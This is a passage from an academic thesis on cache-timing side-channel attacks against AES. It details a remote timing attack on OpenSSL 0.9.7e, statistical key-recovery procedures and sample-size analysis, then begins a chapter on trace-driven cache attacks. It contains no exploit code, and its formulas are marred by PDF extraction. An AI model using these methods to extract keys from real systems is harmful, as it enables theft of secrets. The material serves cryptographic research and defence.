manipulations when the cipher under the attack is running on a multitasking system, especially on a busy server. In our experiments we run a dummy process simultaneously with the cipher process. 75 Our dummy process randomly issues memory accesses and eventually causes the eviction of AES data from the cache. This should not be considered as a form of intentional cache cleaning, because we use this dummy process only to imitate a moderate workload on the server. In presence of different processes that run on the same machine with the cipher process, the memory accesses that are issued by these processes automatically evict the AES data, i.e., cause the same effect of our dummy process on the execution of the cipher. 5.1. The Underlying Principal of Devising a Remote Cache Attack Multitasking operating systems allow the execution of multiple processes on the same computer, concurrently. In other words, each process is given permission to use the resources of the computer, not only the processor but also the cache and other resources. Although it depends on the cache architecture and the replacement policy, we can roughly say that the cache contains most recently used data almost all the time. If an encryption process stalls for enough time, the cipher data will completely be removed from the cache, in case of the presence of other processes on the machine. In a simultaneous multithreading system, the encryption process does not even have to stall. The data of the process, especially parts of large tables, is replaced by other processes’ data on-the-fly, if there is enough workload on the system. The results of our experiments show that the attack can work in such a case on a simultaneous multithreading environment. The reader should note that our results also point the vulnerability of remote systems against Tsunoo’s attack on DES, as well. 76 5.2. Details of Our Basic Attack In this section we outline an example cache attack on AES with a key size of 128 bits. In our experiments we consider the 128-bit AES version with a block length of 128 bits. Our attack can be adjusted to AES with key length 192 or 256 in a straight-forward manner (cf. Subsect. 5.3). The basic attack consists of two different stages, considering table-lookups from the first and second round, respectively. The basic attack may be considered as an adaption of the ideas from the earlier cache attack works to a timing attack on AES since similar equations are used. Our improved attack variant is a completely novel approach. It employs a different decision strategy than the basic one and is much more efficient. It does not have different parts and falls into sixteen independent 8-bit guessing problems. The differences of our approaches from the earlier works are the followings. First of all, we exploit the internal collisions, i.e., the collisions between different table lookups of the cipher. Some of the earlier works (e.g. [73, 67, 77, 15]) exploits the cache collisions between the memory accesses of the cipher and another process. Exploiting such external collisions mandates the use of explicit local cache manipulations by (e.g.) having access to the target machine and reading a local data structure. This necessity makes these attacks unable to compromise remote systems. On the other hand, taking advantage of internal collisions removes this necessity and enables one to devise remote attacks as shown in this chapter. The idea of using internal collisions is employed in some of the previous works, e.g. in [101, 100, 62]. The earlier timing attacks that rely on internal collisions perform the so-called cache cleaning, which is also a form of explicit local cache manipulations. These works did not realize the possibility of automatic 77 cache evictions due to the workload on the system, and therefore could not show the feasibility of remote attacks. We use the second attack model explained in the previous chapter. The attack model discussed in Section 4.1.1.2 is partially correct, except the lack of counting the fact that two different accesses to the same cache line may even increase the overall execution time. We realized during our experimentation that an internal collision, i.e., a cache hit, at a particular AES access either shortens or lenghtens the overall execution time. The latter phenomenon may occur if a cache hit occurs from a logical point of view but the respective cache line has not already been loaded, inducing double work. Thus, if we gather a sample of messages and each of these messages generates a cache hit during the same access, then the execution time distribution of this sample will be significantly different than that of a random sample. We consider this fact to develop our attacks on the AES. 5.2.1. First Round Attack The implementation we analyze is described in [31] and it is widely used on 32-bit architectures (c.f. Section 2.2.2). The first 4 references to the first table, T0, are: P0 ⊕ K0 , P4 ⊕ K4 , P8 ⊕ K8 , P12 ⊕ K12 . If any two of these four references are forced to map to the same cache line for a sample of plaintext then we know that this will affect the average execution time. For example, if we assign the value hP0 ⊕ K0 ⊕ K4 i to hP4 i, i.e., hP4 i = hP0 ⊕ K0 ⊕ K4 i 78 for a large sample of plaintexts, then the timing characteristics of this sample will be different than that of a randomly chosen sample. We can use this fact to guess the correct key byte difference hK0 ⊕ K4 i. Using the same idea, we can find all key byte differences i,j = hKi ⊕ Kj i with i, j ∈ {0, 4, 8, 12}. For properly selected indices (i1 , j1 ), (i2 , j2 ), (i3 , j3 ), i.e. if the GF (2)-linear span of {Ki1 ⊕ Kj1 , Ki2 ⊕ Kj2 , Ki3 ⊕ Kj3 } contains all six XOR sums K0 ⊕ K4 , K0 ⊕ K8 , . . . , K8 ⊕ K12 , then each i,j follows immediately from i1 ,j1 , i2 ,j2 and i3 ,j3 . We can further reduce the search space by considering the accesses to other three tables T1, T2 and T3. In general, we can obtain hKi ⊕ K4∗j+i i for i, j ∈ {0, 1, 2, 3}. Since (8 − `) is the size of the most significant part of a table entry in terms of the number of bits (c.f. Section 4.1.1.2) the first round attack allows us to reduce the search space by 12 ∗ (8 − `) bits. The parameter ` depends on the cache architecture. For ` = 0, which constitutes the theoretical lower bound, the search space for a 128 bit key becomes only 32 bits. For ` = 4 the search space is reduced by 48 bits yielding an 80-bit problem. On widely used processors, the search space typically reduces to 56, 68, or 80 bits for 128-bit keys. In the environment where we performed our experiments the cache line size of the L1 cache is 64 bytes, i.e. the most significant part of a key byte difference is 4 bits long. In other words, we can only obtain the first 4 bits of Ki ⊕ K4∗j+i and the remaining 4 bits have to be searched exhaustively unless we use a second round attack. 79 5.2.2. Second Round Attack – Basic Variant Using the guesses from the first round a similar guessing procedure can be applied in the second round to obtain the remaining key bits. We briefly explain an approach that exploits only accesses to T0 , i.e., the first table. To simplify notation we set ∆i := Pi ⊕ Ki in the remainder of this section. In the second round, the encryption accesses four times to T0, namely to obtain the values 2 • s(∆8 ) ⊕ 3 • s(∆13 ) ⊕ s(∆2 ) ⊕ s(∆7 ) ⊕ s(K13 ) ⊕ K0 ⊕ K4 ⊕ K8 ⊕ 0x01 (5.1) 2 • s(∆0 ) ⊕ 3 • s(∆5 ) ⊕ s(∆10 ) ⊕ s(∆15 ) ⊕ s(K13 ) ⊕ K0 ⊕ 0x01 (5.2) 2 • s(∆4 ) ⊕ 3 • s(∆9 ) ⊕ s(∆14 ) ⊕ s(∆3 ) ⊕ s(K13 ) ⊕ K0 ⊕ K4 ⊕ 0x01 (5.3) 2 • s(∆12 ) ⊕ 3 • s(∆1 ) ⊕ s(∆6 ) ⊕ s(∆11 ) ⊕ s(K13 ) ⊕ K0 ⊕ K4 ⊕ K8 ⊕ K12 ⊕ 0x01 (5.4) where s(x) and • stand for the result of an AES S-box lookup for the input value x and the finite field multiplication in GF(28 ) as it is realized in AES, respectively. If the first access (P0 ⊕ K0 ) touches the same cache line as (5.1) for each plaintext within a sample, i.e. if hP0 i = h2 • s(∆8 ) ⊕ 3 • s(∆13 ) ⊕ s(∆2 ) ⊕ s(∆7 ) ⊕ s(K13 ) ⊕ K4 ⊕ K8 ⊕ 0x01i (5.5) the expected average execution time will be different than for a randomly chosen sample. If we assume that the value hK4 ⊕ K8 i has correctly been guessed within the first round attack this suggests the following procedure. 1. Phase: Obtain a sample of N many (plaintext, execution time) pairs. 2. Phase: Divide the entity of all (plaintext, execution time) pairs into f2 , K f7 , K f8 , K g 232 (overlapping) subsets, one set for each candidate (K 13 ) value. Put each plaintext into all sets that correspond to candidates 80 f2 , K f7 , K f8 , K g (K 13 ) that satisfy the above equation. Note that a particular plaintext should be contained in about N/28−` different subsets. 3. Phase: Calculate the timing characteristics of each set, i.e., the average execution time in our case. Compute the absolute difference between each average and the average execution time of the entire sample. There will be a total of 24·8 timing differences, each from a different absolute value of f2 , K f7 , K f8 , K g (K 13 ). The set with the largest difference should point to the correct values for these 4 bytes. Hence, we can search through all candidates for (K2 , K7 , K8 , K13 ) ∈ GF(2)32 to guess the true values. Applying the same idea to (5.2) to (5.4) we can recover the full AES key. Note that in each of the consecutive steps only 4 · 4 = 16 key bits have to be guessed since Ki and the most significant bits from some other Kj follow from the first step and ij from the first round attack (cf. Sect. 5.2.1) where i is a suitable index in {2, 7, 8, 13}. The bottleneck is clearly the first step since one has to distinguish between 232 key hypotheses rather than between 216 . Experimental results are given in Sect 5.4. In the next section we introduce a more efficient variant that saves both samples and computations. 5.3. A More Efficient, Universally Applicable Attack In the previous section, we explain a second round attack where 32, resp. 16, key bits have to be guessed simultaneously. In this section we introduce another approach that allows independent search for single key bytes. It is universally applicable in the sense that it could also be applied in any subsequent round, e.g. to attack AES with 256 bit keys. 81 We explain our idea at (5.1). Our goal is to guess key byte K8 . Recall that access to the same cache line as for (P0 ⊕ K0 ) is required in the second round iff (5.5) holds. If we fix the four plaintext bytes P0 , P2 , P7 , and P13 then (5.5) simplifies to hci = h2 • s(∆8 )i (5.6) with an unknown constant c = c(K0 , K2 , K4 , K7 , K8 , K13 , P0 , P2 , P7 , P13 ). We observe encryptions with randomly selected plaintext bytes Pi for i ∈ / {0, 2, 7, 13} and evaluate the timing characeristics with regard to all 256 possible values of P8 . For the most relevant case, i.e. ` = 4, there are 16 plaintext bytes (2` in the general case) that yield the correct (but unknown) value < 2 • s(∆8 ) > that meets (5.5). Ideally, with regard to the timing characteristics, these 16 plaintext bytes should be ranked first, pointing at the true subkey K8 ; i.e. to a key byte that gives identical right-hand sides < 2 • s(∆8 ) > for all these 16 plaintext bytes. The ranking is done similar as in Sectin 5.2.1. To rank the 256 P8 -bytes one calculates for each subset with equal P8 values the absolute difference of its average execution time with the average execution time of all samples. The set with the highest difference is ranked first and so on. In a practical attack our decision rule says e 8 for which a maximum number of that we decide for that key byte candidate K the t (e.g. t = 16) top-ranked plaintext bytes yield identical h2 • s(∆8 )i values. If the decision rule does not clearly point to one subkey candidate, we may perform the same attack with a second plaintext P00 for which hP0 i 6= hP00 i while we keep P2 , P7 , P13 fixed (changing hci to hc0 i := hci ⊕ hP0 ⊕ P00 i). Applying the same decision rule as above, we obtain a second ranking of the subkey candidates. Clearly, if P8 and P80 meet (5.6) for P0 and P00 , resp., then hP0 ⊕ P00 i = h2 • s(P8 ⊕ K8 )i ⊕ h2 • s(P80 ⊕ K8 )i. (5.7) 82 Equation (5.7) may be used as a control equation for probable subkey candidates e 8 . From the ranking of Pe8 and Pe80 , we derive an order for the pairs (Pe8 , Pe80 ), K e.g. by adding the ranks of the components or their absolute distances from the k) into respective means. For highly ranked pairs (Pe8 , Pe80 ) we substitute (Pe8 , Pe80 , e control equation (5.7) where e k is a probable subkey candidate from the ‘elementary’ attacks. We note that the attack described above can be applied to exploit the relation between any two table-lookups. By reordering a type (5.5)-equation one obtains an equation of type (5.6) whose right-hand side depends only on one key byte (to be guessed) and one plaintext byte. The plaintext bytes that affect the left-hand side are kept constant during the attack. The whole key could be recovered by 16 independent one-key byte guessing problems. We mention that the (less costly) basic first round attacks might be used to check the guessed e0, . . . , K e 15 . subkey candidates K 5.3.1. Comparison with the basic second round attack from Subsect 5.2.2 For sample size N the ’bottleneck’ of the basic second round attack, the 32 bit guessing step, requires the computation of the average execution times of 232 sample subsets of size ≈ N/28−` . In contrast, each of the 16 runs of the improved attack variant only requires the computation of the average execution times of 256 subsets of size ≈ NI /256 (with NI denoting the sample size for an individual guessing problem) and sorting two lists with 256 elements (plaintexts and key byte candidates). Even more important, 16NI will turn out to be clearly smaller than N (cf. Sect. 5.4). 83 The only drawback of the improved variant is that it is a chosen-input attack, i.e., it requires an active role of the adversary. In contrast, the basic variant explained in the previous section is principally a known-plaintext attack, which means an adversary does not have to actively interfere with the execution of the encryption process, i.e., the attack can be carried out by monitoring the traffic of the encryption process. However, this is only true for the (less important) so-called innerprocess attacks (cf. Section 5.4 for details). For ‘real’ attacks (interprocess and remote attacks) the basic variant is performed as a choseninput attack, too, since the attacker needs to choose the plaintext to be encrypted as the concatenation of several identical 128 bit strings in order to increase the signal-to-noise ratio. 5.4. Experimental Details and Results We performed two types of experimental attacks that we call innerprocess and interprocess attacks to test the validity of our attack variants. In innerprocess attack we generated a random single-block of messages and measured their encryption times under the same key. The encryption was just a function that is called by the application to process a message. The execution time of the cryptosystem was obtained by calculating the difference of the time just before the function call and immediately after the function return. Therefore, there was minimum noise and the execution time was measured almost exactly. For the second part of the experiments, i.e., interprocess attack, we implemented a simple TCP server and a client program that exchange ASCII strings during the attack. The server reads the queries sent by the client, and sends a response after encrypting each of them. The client measures the time between 84 sending a message and receiving the reply. These measurements were used to guess the secret key. The server and client applications run on the same machine in this attack. There was no transmission delay in the time measurements but network stack delays were present. Brumley and Boneh pointed out that a real remote attack over a network is principally able to break a remote cipher, when the interprocess version of the same attack works successfully. Furthermore, their experiments also show that their actual remote attack requirs roughly the same number of samples used in the interprocess version [21]. Therefore, we only performed interprocess experiments. Applying an interprocess attack successfully is a sufficient evidence to claim the actual remote version would also work with (most likely) a larger sample size. We performed our attack against OpenSSL version 0.9.7e. All of the experiments were run on a 3.06 GHz. HT-enabled Xeon machine with a Linux operating system. The source code was compiled using the gcc compiler version 3.2.3 with default options. We used random plaintexts generated by rand() and srand() functions available in the standard C library. The current time is fed into srand() function, serving as seed for the pseudorandom number generator. We measured time in terms of clock cycles using the cycle counter. For the experiments of innerprocess attack, we loaded 8 KB garbage data into the L1 cache before each encryption to remove all AES data from the first level cache. We did not employ this type of cache cleaning during the experiments of interprocess attack. Instead, we wrote a simple dummy program that randomly accesses an 8 KB array and run this program simultaneously with the server in order to imitate the effect of a workload on the computer. We used two parameters in our experiments. 85 1. Sample Size (N ): This is the number of different (plaintext, execution time) pairs collected during the first phase of the attacks. We have to use a large enough sample of queries to obtain accurate statistical characteristic of the system. However, a very large sample size causes unnecessary increase in the cost of the attack. 2. Message Length (L): This is the number of message blocks in each query. We concatenated a single random block L many times with one another to form the actual query. L was 1 during the innerprocess attack, i.e., each query was a single block, whereas it was 1024 in the interprocess attack. This parameter is used to increase the signal-to-noise ratio in the case of having network delays in the measurements. We performed our attacks on the variant of AES that has 128-bit key and block sizes. The cache line size of L1 cache is 64 bytes, which makes ` = 4 bits. The cipher was run on ECB mode. In our experiments, we performed all second round guessing problems for the basic attack with only 212 different key hypotheses, one of them being the correct key combination. Our intention was to demonstrate the general principle but to save many encryptions. In this way, we reduced the complexity of ‘bottleneck’ exhaustive search by even more than a factor of 220 since less samples are sufficient for the reduced search space. For the innerprocess attack, collecting 218 samples was enough to find the correct value of the key. Since we only considered 212 different key hypotheses in second round guessing problems, the required sample size would be more than 218 for a real scale innerprocess attack. In fact, statistical calculations suggest that 4∗218 samples should be sufficient for 232 key hypotheses although in a strict sense (5.13) only guarantees an error probability of at most 2/(1 − c) − 2 /(1 − c)2 > 86 2 − 2 (cf. Example 1 in Section 5.5). (The right-hand side denotes the error probability for the reduced search space while c is unknown.) However, (5.11) is a (pessimistic) lower bound we may expect that the true error probability is indeed significantly smaller, possibly after increasing the sample size somewhat. The key experiment is the interprocess attack, which shows the vulnerability of remote servers against such cache attacks. In our experiments, we collected 50 million random but known samples and applied our attack on this sample set. This sample size was clearly sufficient to reveal the correct key value among 212 different key hypotheses. Again, the same heuristic arguments indicate the sufficiency of 200 million samples in a real-scale attack. We also estimated the number of required samples in a remote attack over a local network. Rough statistical considerations indicate that increasing the sample size of the interprocess attack by a factor of less than 6 should be sufficient to successfully apply the attack on a remote server. We tested our improved variant on the same platform with the same settings. The only difference was the set of the plaintexts sent to the server. We only performed interprocess attack with this new decision strategy. Our experimental results indicate a clear improvement over the basic attack. We could recover a full 128-bit AES key by encrypting slightly more than 6.5 million samples in average per each of the 16 guessing problems and a total of 106 million queries, each containing L = 1024 message blocks. Recall the further advantage of the improved variant, namely the much lower analysis costs. We want to mention that all of these results correspond to the minimum number of samples from which we got the correct decision from our decision strategy. In a real-life-attack an adversary clearly has to collect more samples to be confident on her decisions in a real attack. More sophisticated stochastic models 87 that are tailored to specific cache strategies certainly will improve the efficiency of our attack. Our client-server model does not perfectly fit into the behavior of an actual security application. In reality, encrypting/decrypting parties do not send responses immediately and perform extra operations, besides encryption and decryption. However, this fact does not nullify our client-server model. Although, the less signal-to-noise ratio in actual attacks increases the cost, it does not change the principle feasibility of our attacks. We want to mention that timing variations caused by extra operations decrease the signal-to-noise ratio. If a security application performs the same operations for each processed message, we expect the “extra timing variations” to be minimal, in which case the decrease in the signal-to-noise ratio and thus the increase in the cost of the attack also remains small. 5.5. Scaling the Sample Size N In order to save measurements we performed our practical experiments to the basic second round attack from Subsect. 5.2.2 with a reduced key space. Clearly, to maintain the success probability for the full subkey space the sample size N must be increased to N 0 since the adversary has to distinguish between more admissible alternatives. In this section we estimate the ratio r := N 0 /N . We interpret the measured average execution times for the particular subkey candidates as realizations of normally (Gaussian) distributed random variables, denoted by Y (related to the correct subkey) and X1 , . . . , Xm−1 (related to the wrong subkey candidates) for the reduced subkey space, resp. X1 , . . . , Xm0 −1 when all possible subkeys are admissible. We may assume Y ∼ N (µA , σA2 ) while 88 Xj ∼ N (µB , σB2 ) for j ≤ m − 1, resp. for j ≤ m0 − 1, with unknown expectations µA and µB and variances σA2 and σB2 . Clearly, µA 6= µB since our attack exploits differences of the average execution times. Since it only exploits the relation between two table lookups σA2 ≈ σB2 seems to be reasonable, the variances clearly depending on N . W.l.o.g. we may assume µA > µB . We point out that E(X1 + ... + Xm−1 + Y )/m ≈ µB unless m is very small. Pr(correct guess) ≈ Pr(|Y − µB | > max{|X1 − µB |, . . . , |Xm−1 − µB |}) = Pr(min{X1 , ...., Xm−1 } > µB − (Y − µB ), max{X1 , ..., Xm−1 } < Y ) ≈ Pr(max{X1 , ..., Xm−1 } < Y )2 (5.8) Unless m is very small the ≈ sign should essentially be “=”. If the random variables Y, X1 , . . . , Xm−1 were independent we had Pr(max{X1 , ..., Xm−1 } ≤ t) = m−1 Y Pr(Xj ≤ t) = (5.9) j=1 = Φ((t − µB )/σB )m−1 where Φ denotes the cumulative distribution function of the standard normal distribution. From (5.9) one immediately deduces Z ∞ Pr(max{X1 , ..., Xm−1 } < Y ) ≈ Φ((z − µB )/σB )m−1 fA (z)dz (5.10) −∞ where Y has density fA . In the context of Subsect. 5.2.2 the random variables Y, X1 , . . . , Xm−1 are yet dependent. However, for different subkey candidates ki and kj the size of the intersection of the respective subsets is small compared to the size of these subsets themselves. Hence we may hope that the influence of the correlation between Xi and Xj is negligible. Under this asumption (5.10) provides a concrete formula for the probability for a true guess. However, this formula cannot be evaluated in practice since µA , µB and σA2 ≈ σB2 are unknown. Instead, we prove useful Lemma. 89 Lemma 1. (i) Let f denote a probability density, while 0 ≤ g, h ≤ 1 are integrable functions and Mc := {y : g(y) ≤ c}. Assume further that h ≥ g on R \ Mc . Then Z h(z)f (z)dz ≥ 1 − 1−c Z if g(z)f (z)dz = 1 − (5.11) (ii) Let s, u, b > 1. Then there exists a unique y0 > 0 with Φ(y0 s)ub = Φ(y0 )b . In particular, Φ(ys)ub > Φ(y)b iff y > y0 . Proof. Assertion (i) follows immediately from (1 − g(z))f (z)dz ≤ f (z)dz ≤ (1 − c) Z Z Z (1 − g(z))f (z)dz = Mc Mc and hence Z Z Z h(z)f (z) dz ≥ 0 + g(z)f (z) dz = (1 − ) − g(z)f (z) Mc Z c =1− . ≥ (1 − ) − c f (z) dz ≥ 1 − − 1−c 1−c Mc R\M Since Φ(ys)ub /Φ(y)b = (Φ(ys)u /Φ(y))b we may assume b = 1 in the remainder w.l.o.g. Clearly, Φ(ys)u < Φ(y) for y < 0. Hence we concentrate to the case y ≥ 0. In particular, log(1 − x) = −x + O(x2 ) implies ψ(y) := log (Φ(ys)u /Φ(y)) = u log(Φ(ys)) − log(Φ(y)) = u log(1 − (1 − Φ(ys))) − log(1 − (1 − Φ(y))) = −u (1 − Φ(ys)) + (1 − Φ(y)) + O (1 − Φ(y))2 ! 1 1 1 u −y2 /2 s2 1 1 −y2 /2 2 −y 2 /2 − e −√ e +O e ≥ √ y 2π y y 3 2π ys > 0 for sufficiently large y, and lim ψ(y) = 0. y→∞ (5.12) We note that the last assertion follows immediately from the definition of ψ while the ’≥’ sign is a consequence from a well-known inequality of the tail of 1 − Φ (see, 90 e.g., [36], Chap. VII, 175 (1.8)). Since ψ is continuous and ψ(0) = log(0.5u−1 ) < 0 there exists a minimal y0 > 0 with ψ(y0 ) = 0. For any y1 ∈ {y ≥ 0 | ψ 0 (y) = 0} the second derivative simplifies to ψ 00 (y1 ) = t(y1 )Φ0 (y1 )/Φ(y1 ) with t(x) := (1 − s2 )x + (1 − 1/u)Φ0 (x)/Φ(x). (Note that Φ00 (ys) = −ysΦ0 (ys) and Φ00 (y) = −yΦ0 (y).) Assume that ψ(y00 ) = 0 for any y00 > y0 . As ψ(0) < 0 and ψ(y0 ) = ψ(y00 ) = 0 the function ψ attains a local maximum in some ym ∈ [0, y00 ). Since t : [0, ∞) → R is strictly monotonously decreasing ψ cannot attain a local minimum in (ym , ∞) (with ψ(·) ≤ 0 = ψ(y00 )) which contradicts (5.12). This proves the uniqueness of y0 and completes the proof of (ii). Our goal is to apply Lemma 1 to the right-hand side of (5.10). We set √ u := (m0 −1)/(m−1), b := 1 and s := r with r := N 0 /N . Further, f (z) := fA (z), √ g(z) := (Φ((z − µB )/σB ))m−1 and h(z) := (Φ( r(z − µB )/σB ))u(m−1) . By (ii) we have c = Φ((z0 − µB )/σB )m−1 and Mc = (∞, z0 ] with g(z0 ) = h(z0 ). Lemma 1 and (5.8) imply Pr(correct guess for (m, N )) = (1 − )2 ⇒ " Pr(correct guess for (m0 , N 0 = rN )) ≥ 1− (5.13) 1−c 2 # providing a lower probability bound for a correct guess in the full key space attack. Note that µA , µB , σA2 ≈ σB2 , N, r determine , c and z0 which are yet unknown in real attacks since µA and µB are unknown. Example 1 gives an idea of the magnitude of r. Example 1. Let m = 212 , m0 = 232 , and y0 := (z0 − µB )/σB = Φ−1 (c1/(m−1) ). If c = 0.5 (resp., if c = 100/101) the number r = N 0 /N = 3.09 (resp., r = 3.85) √ gives Φ(y0 r)u(m−1) = Φ(y0 )m−1 = 0.5 (resp., = 100/101). 91 5.6. Conclusion We have presented a cache-based timing attack on AES software implementations. Our experiments indicate that cache attacks can be used to extract secret keys of remote systems if the system under attack runs on a server with a multitasking or multithreading system and a large enough workload. Although a large number of measurements are required to successfully perform a remote cache attack, it is feasible in principle. In this regard, we would like to point the feasibility of such cache attacks to the public, and recommend implementing appropriate countermeasures. Several countermeasures [75, 14, 73, 76, 77, 19] have been proposed to prevent possible vulnerabilities and develop more secure systems. 92 6. TRACE-DRIVEN CACHE ATTACKS ON AES There are various cache based side-channel attacks in the literature, which are discussed in detail in Chapter 4. Trace-driven attacks are one of the three types of cache based attacks that had been distinguished so far, c.f. Section 4.1. We present a trace-driven cache based attack on AES in this chapter. There are already two trace-driven attacks on AES in the literature [15, 62]. However, our attacks require significantly less number of measurements (e.g. only 5 measurements in some cases) and are much more efficient than the previous attacks. We show that trace-driven attacks have indeed much more power than what is stated in the previous studies. Furthermore, we present a robust computational model for trace-driven attacks that allows one to evaluate the cost of such attacks on a given implementation and platform. Although, we only apply our model to a single attack on AES in this document, it can also be used for other symmetric ciphers like DES. The main contribution of our model to the field is that it can be used to quantitatively analyze the cost of trace-driven attacks on different implementations of a cipher. Therefore, we can analyze the effectiveness of various mitigations that can be used against such attacks. Thus, a designer can use our model to determine which mitigations he needs to implement against trace-driven attacks to achieve a predetermined security level. 6.1. Overview of Trace-Driven Cache Attacks The adversary is assumed to be able to capture the profile of the cache activity during an encryption in trace-driven attacks. This profile includes the outcomes of every memory access the cipher issues in terms of cache hits and 93 misses. Therefore, the adversary has the ability to observe if a particular access to a lookup table yields a hit and can infer information about the lookup indices, which are key dependent. This ability gives an adversary the opportunity to make inferences about the secret key. Trace-driven attacks on AES were first presented in [62, 15]. Bertoni et al. implemented a cache based power attack that exploits external collisions between different processes [15]. Their attack requires 256 power traces to reveal the secret AES key. Lauradoux’s power attack exploits the internal collisions inside the cipher but only considers the first round AES accesses and can reduce the exhaustive search space of a 128-bit AES key to 80 bits. These attacks are described in more detail in Sections 4.2.7 and 4.2.8. We describe much more efficient trace-driven attacks on AES in this chapter. Our two-round attack is a known-plaintext attack and exploits the collisions among the first two rounds of AES. A more efficient version, which we call the last round attack, considers last round accesses and is a known-ciphertext attack. In trace-driven cache attacks, the adversary obtains the traces of cache hits and misses for a sample of encryptions and recovers the secret key of a cryptosystem using this data. We define a trace as a sequence of cache hits and misses. For example, M HHM, HM HM, M M HM, HHM H, M M M M, HHHH are examples of a trace of length 4. Here H and M represents a cache hit and miss respectively. The first one in the first example is a miss, second one is a hit, and so on. If an adversary captures such traces, he can determine whether a particular access during an encryption is a hit or a miss. 94 The trace of an encryption can be captured by the use of power consumption measurements as done in [15, 62]. In this document, we do not get into the details of how to capture cache traces. We analyze trace-driven attacks on AES under the assumption that the adversary can capture the traces of AES encryption. This assumption corresponds to clean measurements in a noiseless environment. In reality, an adversary may have noise in the measurements in some circumstances, in which case the cost of the attack may increase depending on the amplitude of the noise. However, an analysis under the above assumption gives us a more clear understanding of the attack cost. Assumption of a noiseless environment also enables us to make more reliable comparison of different attacks. In a side-channel attack, there are essentially two different phases: • Online Phase: consists of the collection of side-channel information of the target cipher. This phase is also known as the sampling phase of the attack. The adversary encrypts or decrypts different input values and measures the side-channel information, e.g., power consumption or execution time of the device. • Offline Phase: is also known as the analysis phase. In this phase, the adversary processes the data collected in the online phase and makes predictions and verifications regarding the secret value of the cipher. An adversary usually performs the former phase completely before the latter one. However, in some cases, especially in adaptive chosen-text attacks (e.g. [21, 6]), these two phases may overlap and may be performed simultaneously. We use two different metrics to evaluate the cost of our attacks. The first metric is the expected number of traces that we need to capture to narrow the search space of the AES key down to a certain degree. The second metric is the 95 average number of operations we need to perform to analyze the captured traces and eliminate the wrong key assumptions. These metrics basically represent the cost of the online and offline phases of our attacks. As the reader can clearly see in this chapter, there is a trade-off between the costs of these two phases. 6.2. Trace-Driven Cache Attacks on the AES In this chapter, we present trace-driven attacks on the most widely used implementation of AES, and estimate their costs. We assume that the cache does not contain any AES data prior to each encryption, because the captured traces cannot be accurate otherwise. Therefore, the adversary is assumed to clean the cache (e.g., by loading some garbage data as done in [15, 100, 101, 73, 80]) before the encryption process starts. Another assumption we make is that the data in AES lookup tables cannot be evicted from the cache during the encryption once they are loaded into the cache. This assumption means that each lookup table can only be stored in a different non-overlapping location of the cache and there is no context-switch during an encryption or any other process that runs simultaneously with the cipher and evicts the AES data. These assumptions hold if the cache is large enough, which is the case for most of the current processors. An adversary can also discard a trace if a context-switch occurs during the measurement. We also assume that each measurement is composed of the cache trace of a single message block encryption. In this document, we only consider AES with 128-bit key and block sizes. Our attacks can easily be adapted to longer key and block sizes; however we omit these cases for the sake of simplicity. 96 The implementation we analyze is described in [31] and it is suitable for 32-bit architectures (c.f. Section 2.2.1). It employs 4 different lookup tables in the first 9 rounds and a different one in the last round. In this implementation, all of the component functions, except AddRoundKey, are combined into four different tables and the rounds turn to be composed of table lookups and bitwise exclusive-or operations. In each round, except the last one, it makes 4 references to each of the first 4 tables. The S-box lookups in the final round are implemented as table lookups to another 1KB-large table , called T4, with 256 many 32-bit elements. There are 16 accesses to T4 in that round. The indices of these accesses are Si10 , where Sit is the byte i of intermediate state value that becomes the input of round t and i ∈ {0, .., 15}. Let C be the ciphertext, i.e. the output of the last round, and represented as an array of 16 bytes, C = (c0 , c1 , ..., c15 ). Individual bytes of C are computed as: ci = Sbox[Sw10 ] ⊕ RKi10 , where RKi10 is the ith byte of the last round key and Sbox[Sw10 ] is the S-box output for the input Sw10 for a known w ∈ {0, 1, ..., 15}. The S-box in AES implements a permutation, and therefore its inverse, i.e. Sbox−1 , exists. 6.2.1. Overview of an Ideal Two-Round Attack The access indices in the first round are in the form Pi ⊕ Ki , where Pi and Ki are the ith bytes of the plaintext and the cipherkey respectively and i ∈ {0, 1, ..., 15}. The indices of the first 4 references to the first table, T0, are: P0 ⊕ K0 , P4 ⊕ K4 , P8 ⊕ K8 , P12 ⊕ K12 . 97 The outcome of the second access to T0, i.e. the one with the index P4 ⊕ K4 , gives information about K0 and K4 . For example, if the second access results a cache hit, we can directly conclude that the index P4 ⊕ K4 has to be equal to the index of the first access, i.e., P0 ⊕ K0 . If it is a cache miss, then the inequality of these values becomes true. We can use this fact to find the correct key byte difference K0 ⊕ K 4 . P 0 ⊕ K0 = P 4 ⊕ K4 => K0 ⊕ K4 = P0 ⊕ P4 P0 ⊕ K0 6= P4 ⊕ K4 => K0 ⊕ K4 6= P0 ⊕ P4 In other words, if we capture a cache trace during the first round of AES and the second access to T0 results in a cache hit, then we can directly conclude that K0 ⊕ K4 = P0 ⊕ P4 . Recall that the plaintext is assumed to be known to an attacker and the cache is clean prior to the first table lookup so that the first access to a table always results in a cache miss. On the other hand, if we see a miss, then K0 ⊕ K4 cannot be equal to P0 ⊕ P4 and we can eliminate this wrong value. If we collect a sample of traces, we can find the correct value of K0 ⊕ K4 by either eliminating all possible wrong values or directly finding the correct value when we realize a cache hit in the second access in any of the sampled traces. We can also find the other key byte differences Ki ⊕ Kj , where i,j ∈ {0,4,8,12}, using the same idea. We can further reduce the search space by considering the accesses to other three tables. In general, we can obtain Ki ⊕ K4∗j+i , where i,j ∈ {0,1,2,3}, and it is enough to find the entire 128-bit key by searching only 32 bits. A final search space of 32 bits is only a theoretical lower bound in the first round attack due to the complications explained in Subsection 6.2.3. We also have 98 to consider second round accesses to really reduce the search space to 32 bits. The first round attack only reveals some of the bits of Ki ⊕ Kj . However, when we examine the collisions between the first and second round accesses in the same way, i.e., in a “two-round attack”, we can reveal the entire AES key. 6.2.2. Overview of an Ideal Last Round Attack Another way to find the cipherkey is to exploit the collisions between the last round accesses. The outcomes of the last round accesses to T4 leaks information about the values of the last round key bytes, i.e., RKi10 where i ∈ {0, .., 15}. The S-box lookups in the final round are implemented as table lookups to another 1KB-large table , called T4, with 256 many 32-bit elements. Four repetations of the same 8-bit long Sbox element are concatenated to each other to form the corresponding 32-bit long element of T4. There are 16 accesses to T4 in that round. The indices of these accesses are Sw10 , where Swt is the byte w of the intermediate state value that becomes the input of round t and w ∈ {0, .., 15}. Let C be the ciphertext, i.e. the output of the last round, and represented as an array of 16 bytes, C = (c0 , c1 , ..., c15 ). Individual bytes of C are computed as: ci = Sbox[Ii ] ⊕ RKi10 , where RKi10 is the ith byte of the last round key, Sbox[Ii ] is the S-box output for the input index Ii , and Ii = Sw10 for known w, i ∈ {0, 1, ..., 15}. Ii is equal to Sw10 for known values of i and w, but the actual mapping between these variables is not relevant for our purposes. In this paper, we present our attack under the assumption that the AES memory 